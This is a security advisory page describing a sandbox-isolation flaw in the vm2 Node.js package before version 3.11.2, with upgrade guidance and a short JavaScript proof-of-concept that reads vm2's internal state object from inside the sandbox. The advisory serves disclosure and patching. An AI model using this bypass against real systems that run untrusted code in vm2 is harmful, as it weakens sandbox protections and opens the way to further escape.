Improper Isolation or Compartmentalization Affecting vm2 package, versions <3.11.2
Threat Intelligence
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk IDSNYK-JS-VM2-16624522
- published10 May 2026
- disclosed8 May 2026
- creditXmiliaH
Introduced: 8 May 2026
New CVE NOT AVAILABLE CWE-653 (opens in a new tab)How to fix?
Upgrade vm2 to version 3.11.2 or higher.
Overview
vm2 is a sandbox that can run untrusted code with whitelisted Node's built-in modules.
Affected versions of this package are vulnerable to Improper Isolation or Compartmentalization through the setupSandboxScript bootstrap in lib/vm.js and lib/setup-sandbox.js. An attacker can read the sandbox’s VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL object by supplying computed property accesses such as globalThis['VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL'], Reflect.get, descriptor APIs, or own-property enumeration. This exposes the live internal state object to sandboxed code, including helper methods such as handleException and wrapWith, breaking the sandbox’s protection against direct access to vm2 internals and enabling further abuse of those exposed primitives.
Notes: This is a complementary fix for CVE-2026-44003
PoC
const { VM } = require("vm2");
const vm = new VM();
// Access internal state (bypassed — no catch/import/async keywords)
const result = vm.run(`
var x = VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL;
Object.keys(x).join(",")
`);
console.log(result); // "wrapWith,handleException,import"
// Control test — blocked when catch keyword is present
try {
vm.run(`
try {
var x = VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL;
} catch(e) { e.message }
`);
} catch(e) {
console.log(e.message); // "Use of internal vm2 state variable"
}